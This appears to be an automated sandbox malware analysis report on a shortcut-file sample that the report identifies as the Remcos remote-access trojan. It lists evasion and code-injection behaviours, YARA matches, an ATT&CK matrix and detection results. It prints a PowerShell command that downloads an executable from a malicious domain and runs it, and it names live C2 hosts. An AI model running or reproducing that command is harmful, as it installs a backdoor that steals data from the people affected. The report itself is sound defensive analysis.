Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915CA0 mov eax, dword ptr fs:[00000030h]	13_2_6C915CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5D78 mov eax, dword ptr fs:[00000030h]	19_2_6FEA5D78
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5CA0 mov eax, dword ptr fs:[00000030h]	19_2_6FEA5CA0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6FE33F34
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6FE3CE5C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE38034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6FE38034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_6C92CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C923F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6C923F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C928034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6C928034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FEB3F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEBCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6FEBCE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FEB8034

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FE266A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6C982E3D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FEA66A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF0F4DD	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6C9166A2	Jump to behavior
Source: C:\Users\user\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x701066A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF038F3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF12B32	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 8164 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 8164 base: 4A0000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4044 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4044 base: 560000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 2056 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 2056 base: 400000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 1180 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 1180 base: 310000 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4A0000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 560000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 310000	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_0040D72E cpuid

11_2_0040D72E

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,	11_2_00401F9D
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoA,	12_2_6FE44DBC
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	12_2_6FE289B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	13_2_6C934DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	13_2_6C9189B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	19_2_6FEC4DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	19_2_6FEA89B5

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

11_2_00401626

Source: C:\Users\user\DZIPR.exe

Code function: 12_2_6FE3D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

12_2_6FE3D72B

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

11_2_00404FAA

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	131 Masquerading	1 Input Capture	2 System Time Discovery	Remote Services	1 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	31 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	311 Process Injection	Security Account Manager	11 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSA Secrets	11 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	144 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MdkbG2pK4l.lnk	8%	ReversingLabs
MdkbG2pK4l.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\lejp	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\paogviura	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\rjhlrgwt	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Temp\lejp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\paogviura	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\rjhlrgwt	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	87%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\user\AppData\Local\Temp\lejp	87%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\user\AppData\Local\Temp\paogviura	87%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\user\AppData\Local\Temp\rjhlrgwt	87%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\hello.exe	3%	ReversingLabs
C:\Users\user\DZIPR.dll	0%	ReversingLabs
C:\Users\user\DZIPR.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.symauth.com/cps0(	0%	URL Reputation	safe
fullimmersion777.com	0%	Avira URL Cloud	safe
https://www.digicert.c	0%	Avira URL Cloud	safe
http://www.vmware.com/0/	0%	Avira URL Cloud	safe
https://www.datanumen.com/zip-repair/	0%	Avira URL Cloud	safe
http://lawyerconsult.top/AUGUST.exe	0%	Avira URL Cloud	safe
http://www.vmware.com/0	0%	Avira URL Cloud	safe
http://www.symauth.com/rpa00	0%	Avira URL Cloud	safe
https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm	0%	Avira URL Cloud	safe
http://www.info-zip.org/	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/Prod1C:	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV21C:	0%	Avira URL Cloud	safe
https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf	0%	Avira URL Cloud	safe
http://www.repairfile.com	0%	Avira URL Cloud	safe
http://c0rl.m%L	0%	Avira URL Cloud	safe
https://www.datanumen.com/%https://www.datanumen.com/zip-repair/	0%	Avira URL Cloud	safe
http://support.datanumen.com	0%	Avira URL Cloud	safe
https://www.datanumen.com/support/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lawyerconsult.top	172.94.3.25	true	true		unknown
171.39.242.20.in-addr.arpa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lawyerconsult.top/AUGUST.exe	true	Avira URL Cloud: safe	unknown
fullimmersion777.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://g.live.com/odclientsettings/Prod1C:	edb.log.18.dr	false	Avira URL Cloud: safe	unknown
https://www.digicert.c	DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
